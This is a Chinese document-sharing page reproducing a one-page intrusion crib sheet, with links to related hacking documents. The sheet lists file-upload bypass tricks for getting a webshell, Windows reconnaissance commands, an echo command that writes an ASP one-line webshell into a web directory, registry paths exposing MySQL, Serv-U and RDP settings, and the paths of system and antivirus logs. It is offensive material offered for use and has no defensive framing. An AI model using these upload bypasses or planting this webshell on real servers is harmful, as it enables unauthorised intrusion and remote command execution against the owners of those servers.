豆搜网 文档下载 文档下载导航
设为首页 | 加入收藏
搜索 请输入内容:  
 导航当前位置: 文档下载 > 所有分类 > IT/计算机 > 入侵渗透中用到的一些技巧和思路
侵权投诉

入侵渗透中用到的一些技巧和思路

入侵渗透中用到的一些技巧和思路

上传漏洞拿shell

1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.

2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。

3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。

4.gif文件头欺骗

入侵渗透中用到的命令,语法

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息

tasklist /svc 查看 服务对应的pid

netstat -ano

fsutil.exe fsinfo drives 列出全部盘符

dir d:\*conn*.* /s 找数据库连接文件

telnet 218.25.88.234 3389 对外部是否开放了这个端口目录

echo ^<%execute(request("cmd"))%^> >>e:\k\X.asp 写一句话到e:\k\目录,密码为

cmd.

type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp 传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mysql 注册表位置

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机位置

HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ serv-u 位置

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters 1433端口

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径

服务器日志文件物理路径

安全日志文件:%systemroot%\system32\config \SecEvent.EVT

系统日志文件:%systemroot%\system32\config \SysEvent.EVT

应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT

FTP连接日志和HTTPD事务日志:systemroot% \system32\LogFiles\,下面还有子文件夹,

分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。

诺顿杀毒日志:C:\Documents and Settings\All Users\Application Data\Symantec

BY:康斯坦丁收集整理,

第1页

热门文档

相关文档

  • 入侵渗透思路

    入侵渗透思路 入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。...测试方法是发送一大串包到某些随机选取的高端口,然后计算返回的不可到达包的数目...

  • 入侵渗透的思路

    入侵渗透的思路_IT/计算机_专业资料。入侵的一些思路今日推荐 180份文档 2014...入侵渗透中用到的一些技... 1页 1下载券喜欢此文档的还喜欢 ...

  • 脚本渗透思路

    入侵渗透中用到的一些技... 1页 1下载券 入侵渗透思路 8页 1下载券 渗透测试...同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点...

  • 记一次渗透入侵

    记一次“另类”的入侵检测 12页 1财富值 一次典型的社会工程学渗透... 14页 8财富值 入侵渗透中用到的一些技巧... 1页 1财富值 入侵渗透思路 7页 8财富值...

  • 总结渗透入侵国外站思路

    2. 注册网站账户(注册时候看不懂别个说的啥,就用...邮箱欺骗,当然哪些FTP啥的弱口令的没算在社工里面。...入侵渗透的思路 20页 免费 网站入侵方法总结 4页 ...

  • 网站渗透思路

    网站渗透思路_计算机软件及应用_IT/计算机_专业资料。...3.asp(aspx) ACCESS拿shell一般只有3种方法,一是...10.猜路径或者文件在入侵中非常必要,猜不到路径的...

  • 2010最新各种渗透入侵,提权的经验和技巧总结

    2010最新各种渗透入侵,提权的经验和技巧总结。2010最新...#地址池的范围是从192.168.3.1到192.168.3.254...然后用记事本打开“ex0111124.log”,删除里面的一些...

  • 入侵思路-攻击篇-常见WEB攻击

    黑客攻击:入侵渗透思路 7页 2财富值 Web 服务器被...一些网络欺骗的手段, 最后就是社会工程的方法搞定...直接上下载软件(我这 里用的是 Flashget)下载它的...

  • 入侵渗透第一课 入侵前言介绍

    入侵渗透第一课 入侵前言介绍_IT/计算机_专业资料。...使用方法: intext: 这个就是把网页中的正文内容中...入侵渗透的思路 20页 免费 渗透测试指南(更新版) ...

  • 利用进行渗透入侵

    \0'字符在系统中被用作字符串结束的标志,'\0 '...可有两个方法实 现此目的, 一是采用黑客字典进行暴力...入侵渗透的思路 20页 免费 无线局域网的渗透入侵...

  • 入侵渗透中用过的三则VBS代码

    入侵渗透中用过的三则VBS代码 入侵渗透入侵渗透隐藏>...脚本编程的技巧就是组合的技巧。XP和2003比2000自带...分享到: X 分享到: 使用一键分享,轻松赚取财富...

站点地图 | 文档上传 | 侵权投诉 | 手机版
新浪认证  诚信网站  绿色网站  可信网站   非经营性网站备案
本站所有资源均来自互联网,本站只负责收集和整理,均不承担任何法律责任,如有侵权等其它行为请联系我们.
文档下载 Copyright 2013 doc.docsou.com All Rights Reserved.  闽ICP备15022310号-9  闽公网安备 35021102001881号  email
返回顶部